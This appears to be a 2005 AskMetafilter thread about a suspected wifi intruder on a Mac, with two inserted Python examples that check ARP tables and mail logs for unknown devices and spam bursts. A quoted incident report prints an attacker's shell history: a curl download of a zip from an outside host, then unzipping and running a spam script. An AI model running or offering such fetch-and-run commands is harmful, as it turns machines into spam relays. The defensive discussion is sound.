Intruder Alert!
December 22, 2005 11:09 AM

Is there any way to monitor the users or traffic on my wireless home network?

I'm running Airport Extreme, with an Airport Express bridge on my Mac OS 10.4. My network is password protected and encrypted, but there have been some funny goings-on that make me wonder if an intruder has gained access. Is there a utility on Mac OSX that can tell me who is logged on to my network? Also, what are some of the other precautions I can take to prevent unwarranted access to my wifi?
posted by slogger to Computers & Internet (7 answers total)
 
#1: your AP should have a combination of a DHCP table, traffic logs, and other features that track this (not your computer per se). I don't know the Airport AP feature set.

#2: it would really help to at least give a few details of the "funny goings-on" if you're going to take the time to post a question.

#3: the best you should do is to MAC filter, require WPA encryption, and don't broadcast your SSID. the former and latter are no better than hook and eye locks on a door, though, to a determined guest. you can do all kinds of other fancy tricks like having a captive OpenBSD authpf portal, but that's way beyond necessary for a home setup.
posted by kcm at 11:13 AM on December 22, 2005


Well if you think something fishy is going on, you can start by changing your WPA password. If someone did break into your network, this would force them to do it again. When you say something fishy is going on, what do you mean? You can check the DHCP client tables on your router, which would tell you who the router has assigned an IP address to. That might point out extra people. If they are setting an IP themselves, you can try turning on logging on the router, and seeing if packets are being sent by computers that aren't yours.
posted by chunking express at 11:14 AM on December 22, 2005
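The two answers above both come down to the same check: compare the devices the network actually sees against the ones you own. Here is an added example (my own, not from any commenter or from Apple's tools) that does that on the Mac itself: it parses the output of `arp -a` as Mac OS X prints it, normalizes the unpadded MAC octets, and reports any address that is not on a hand-maintained allowlist. The allowlist MACs and the `arp -a` output are constructed sample data, not real devices.

```python
import re
import subprocess

# Constructed allowlist: the devices the owner knows about (hypothetical MACs).
# Keys are normalized: lowercase, zero-padded octets, colon separated.
KNOWN_DEVICES = {
    "00:11:24:cc:dd:ff": "AirPort Extreme base station",
    "00:11:24:cc:dd:02": "AirPort Express bridge",
    "00:1e:c2:aa:bb:01": "iBook (en1)",
}

# Constructed sample of `arp -a` output in the Mac OS X format. Note the
# unpadded octets ("0:1e:c2:aa:bb:1") and the "(incomplete)" entry, both of
# which a naive string comparison would get wrong.
SAMPLE_ARP_OUTPUT = """\
? (192.168.1.1) at 0:11:24:cc:dd:ff on en1 ifscope [ethernet]
? (192.168.1.5) at 0:1e:c2:aa:bb:1 on en1 ifscope [ethernet]
? (192.168.1.7) at 0:11:24:cc:dd:2 on en1 ifscope [ethernet]
? (192.168.1.42) at 0:13:ce:12:34:56 on en1 ifscope [ethernet]
? (192.168.1.99) at (incomplete) on en1 ifscope [ethernet]
"""

# "(incomplete)" entries never match because "(" is not a hex digit or colon.
ARP_LINE_RE = re.compile(r"\((?P<ip>[\d.]+)\) at (?P<mac>[0-9a-fA-F:]+) ")


def normalize_mac(mac):
    """Zero-pad each octet and lowercase so '0:1e:c2:aa:bb:1' == '00:1e:c2:aa:bb:01'."""
    return ":".join(octet.lower().zfill(2) for octet in mac.split(":"))


def parse_arp_table(arp_output):
    """Return a list of (ip, normalized_mac) pairs for resolved ARP entries."""
    entries = []
    for line in arp_output.splitlines():
        match = ARP_LINE_RE.search(line)
        if match:
            entries.append((match.group("ip"), normalize_mac(match.group("mac"))))
    return entries


def find_unknown_devices(arp_output, known=KNOWN_DEVICES):
    """Return the (ip, mac) pairs whose MAC is not in the allowlist."""
    return [(ip, mac) for ip, mac in parse_arp_table(arp_output) if mac not in known]


def live_arp_output():
    """Run `arp -a` on the local machine (Mac OS X / BSD output format assumed)."""
    return subprocess.run(["arp", "-a"], capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    # Swap SAMPLE_ARP_OUTPUT for live_arp_output() to check a real machine.
    for ip, mac in find_unknown_devices(SAMPLE_ARP_OUTPUT):
        print(f"unknown device: {ip} ({mac})")
```

Two caveats that matter for the poster's situation: the Mac's ARP cache only holds hosts that have recently exchanged packets with that Mac, so an intruder talking only to the base station will not appear, and the router's DHCP table misses anyone who set a static address. The base station's own client list is the authoritative view; this script is the quick check you can run from the laptop while you look for it.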


Response by poster: Sorry, I should have been more specific. Some of the funny goings-on include:
- Odd lapses in service, especially during times of day (or night) when traffic spikes seem highly unlikely
- Spam that has my name, or names from people in my address book (the oddest one of late "myname@mydomain.com@otherdomain.com")
- Getting a system message from AIM when not at home telling me my account is logged on at more than one location (usually 3 locations), and my home computer is *definitely* logged out/shut down

I have changed my WPA password a couple of times, including "safe" passwords with lots of upper and lower case letters and numbers. There have been some other strange events too, but the above three are what bothers me most.
posted by slogger at 11:24 AM on December 22, 2005


It is possible that some malware got installed on your OS X machine. Are the passwords on your OS X user accounts non-obvious?

There was a report at Macintouch (which I'm unable to find at the moment) by someone whose OS X machine was compromised. Someone had installed a script that was sending out large volumes of spam.
posted by alms at 11:39 AM on December 22, 2005


OK, here's the report. There was a bunch of follow-up discussion. Unfortunately, I can't link to it because the Macintouch search function doesn't yield pages with unique URLs. But if you go to the Macintouch News Database Search and search for combinations of SSH, Security, Password, and Villeneuve, you'll find it.

Much to my horror, I awoke on the weekend to an e-mail from my service provider which started with:

"Recently we have had complaints of spam coming from your connection."

My wife had complained last week that the computer at home had seemed a bit slow. I rebooted it, and it seemed fine immediately afterwards.
Now I took immediate action, sent an email indicating it was unintentional and I'd take care of it immediately. I pulled the network cable and proceeded to see what had happened.
In a nutshell, about a year ago I'd played around with fast user switching. I'd created an account with the userid of "lisa" and a password of "lisa". Ok, not too swift, but it was convenient for a test. I'd forgotten about it. When I looked in the account's .bash_history file, I found stuff like:

...
curl -O haq.sytes.net/sex.zip
ls
unzip sex.zip
rm -rf sex.zip
cd sex
ls
pico users
chmod +x sendeb.pl
./sendeb.pl
passwd
...

So clearly the person had logged into this not secure, yet still non-admin account and was running scripts. Likely they had gotten in via ssh, since I had the port open so I could do remote maintenance from my office if the need arose.
Checking the /var/log/mail.log (one of the archives), I found that on October 30th it had sent out over 500,000 eBay spam messages.
Just a warning .... make sure you use secure/difficult to guess passwords. i.e. Don't use "guest, guest", or name name userid/password pairs.
Mac OS X is very secure, but not if you leave the doors unlocked and the keys in the ignition.
posted by alms at 11:52 AM on December 22, 2005
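The quoted report found the compromise by noticing an abnormal day in /var/log/mail.log. Here is an added example (mine, not from the Macintouch poster or from Apple) that automates that check: it parses Postfix-style syslog lines of the kind Mac OS X's mail.log contains, counts outbound delivery attempts per day, and flags any day whose volume is far above the median of the other days, along with the hours the sending happened. The log lines are constructed sample data; the exact line layout of a given Postfix version is an assumption.

```python
import re
from collections import Counter, defaultdict
from statistics import median

# Constructed sample of /var/log/mail.log in Postfix syslog style. A normal
# day or two of personal mail, then a burst at 02:00 on Oct 30 to strangers.
SAMPLE_MAIL_LOG = """\
Oct 29 08:12:01 ibook postfix/smtp[311]: 1A2B3C: to=<friend@example.org>, relay=mx.example.org[203.0.113.10]:25, delay=1.2, status=sent (250 OK)
Oct 29 19:40:15 ibook postfix/smtp[330]: 4D5E6F: to=<boss@example.com>, relay=mx.example.com[203.0.113.11]:25, delay=0.9, status=sent (250 OK)
Oct 30 02:14:07 ibook postfix/smtp[871]: 7A8B9C: to=<victim1@example.net>, relay=mx.example.net[203.0.113.12]:25, delay=0.4, status=sent (250 OK)
Oct 30 02:14:07 ibook postfix/smtp[872]: 7A8B9D: to=<victim2@example.net>, relay=mx.example.net[203.0.113.12]:25, delay=0.4, status=sent (250 OK)
Oct 30 02:14:08 ibook postfix/smtp[873]: 7A8B9E: to=<victim3@example.net>, relay=mx.example.net[203.0.113.12]:25, delay=0.5, status=bounced (550 no such user)
Oct 30 02:14:08 ibook postfix/smtp[874]: 7A8B9F: to=<victim4@example.net>, relay=mx.example.net[203.0.113.12]:25, delay=0.4, status=sent (250 OK)
Oct 30 02:14:09 ibook postfix/smtp[875]: 7A8BA0: to=<victim5@example.net>, relay=mx.example.net[203.0.113.12]:25, delay=0.4, status=sent (250 OK)
Oct 31 09:05:33 ibook postfix/smtp[901]: 0C1D2E: to=<friend@example.org>, relay=mx.example.org[203.0.113.10]:25, delay=1.0, status=sent (250 OK)
"""

# Matches the delivery-attempt lines written by postfix/smtp; other daemons'
# lines (pickup, cleanup, qmgr) are ignored so each message is counted once.
LINE_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2}) +(?P<day>\d{1,2}) (?P<hour>\d{2}):\d{2}:\d{2} \S+ "
    r"postfix/smtp\[\d+\]: \w+: to=<(?P<rcpt>[^>]+)>, .*status=(?P<status>\w+)"
)


def parse_deliveries(log_text):
    """Yield (date, hour, status, recipient) for every outbound delivery attempt."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            date = f"{m.group('mon')} {int(m.group('day')):02d}"
            yield date, int(m.group("hour")), m.group("status"), m.group("rcpt")


def deliveries_per_day(log_text):
    """Count delivery attempts (sent and bounced alike) per calendar day."""
    return Counter(date for date, _, _, _ in parse_deliveries(log_text))


def find_spike_days(log_text, multiplier=3.0, floor=1):
    """Flag days whose volume exceeds max(floor, multiplier * median of the other days).

    Returns {date: {"count": n, "hours": [hours with activity]}} so the reader
    can see both how much went out and when (a 2 a.m. burst is itself a clue).
    """
    per_day = deliveries_per_day(log_text)
    hours = defaultdict(set)
    for date, hour, _, _ in parse_deliveries(log_text):
        hours[date].add(hour)
    flagged = {}
    for date, count in per_day.items():
        others = [c for d, c in per_day.items() if d != date]
        baseline = median(others) if others else 0
        if count > max(floor, multiplier * baseline):
            flagged[date] = {"count": count, "hours": sorted(hours[date])}
    return flagged


if __name__ == "__main__":
    # On a real machine: open("/var/log/mail.log").read() (root needed).
    for date, info in find_spike_days(SAMPLE_MAIL_LOG).items():
        print(f"{date}: {info['count']} outbound attempts, hours {info['hours']}")
```

Bounces are counted as well as successful sends on purpose: a spam run produces a large share of 550 rejections, and a day with hundreds of bounces is as telling as one with hundreds of deliveries. On a machine that has been relaying for weeks the median baseline will itself be inflated, so for a first look also glance at the raw per-day counts.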


I'm with alms on this one, this sounds more like your machine itself may be compromised rather than your AP. Can you turn off your wireless network for a few days (run a long CAT5 cable or something) and see if the wackiness subsides?

Sometimes crappy internet service is just....crappy internet service.

The AIM thing would make me very suspicious, though.
posted by popechunk at 1:48 PM on December 22, 2005


I don't know if your router supports it, but it is possible to limit the access to an access point by MAC address (hardware identification code) on most hardware. That's how I keep my network completely secure.

Of course, they could spoof your MAC, but this is highly unlikely. WPA + MAC limits should be enough to keep the baddies out.
posted by mr.dan at 7:38 PM on December 22, 2005

